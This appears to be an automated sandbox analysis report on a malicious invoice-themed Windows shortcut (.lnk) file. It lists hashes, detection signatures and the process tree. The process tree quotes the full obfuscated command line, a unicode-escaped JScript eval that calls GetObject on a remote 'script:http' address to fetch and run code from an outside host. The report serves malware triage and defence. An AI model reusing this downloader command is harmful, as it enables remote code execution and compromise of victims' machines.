Analysis
-
max time kernel
28s -
max time network
31s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
-
submitted
08-05-2023 07:55
General
-
Target
NFeXMLON9DR52O9FKTWO7FQUEO37J4S5B9DE324265780.543546.09296.lnk
-
Size
957B
-
MD5
46beef4c7f71313c133f7dd4c186cc02
-
SHA1
c11af67ddfd2ee687e37d2444b0e2f3793ed2df6
-
SHA256
15fd957d305f9f103bb21444b26726d4f18915ba23221b82f34b1b5ba8a4a163
-
SHA512
c6c69130445bda6cabe0b5934a8e8534407b6e340ea5ba801bbe33b31eb48bf122cc257817dc4c5ee8bd3e52ce4cf9ba3955d8bdef1a9dd80c070584244a869b
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\NFeXMLON9DR52O9FKTWO7FQUEO37J4S5B9DE324265780.543546.09296.lnk1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" C:\Windows\system32\cmd.exe /V/D/c "md C:\jTRXQW9\>nul 2>&1 &&s^eT FMGR=C:\jTRXQW9\^jTRXQW9.^Js&&echo eval('\u0076\u0061\u0072\u0020\u0043\u004b\u006c\u006a\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u004b\u006c\u006a\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022\u003a\u0068\u0022\u003b\u0045\u004b\u006c\u006a\u003d\u0022\u0054\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0043\u004b\u006c\u006a\u002b\u0044\u004b\u006c\u006a\u002b\u0045\u004b\u006c\u006a\u002b\u0022\u002f\u002f\u0076\u0065\u0069\u0061\u0065\u0067\u002e\u0063\u0061\u0062\u0065\u0063\u0061\u002e\u0074\u006f\u0070\u002f\u003f\u0031\u002f\u0022\u0029\u003b'); >!FMGR!&&ca^ll !FMGR!"2⤵
-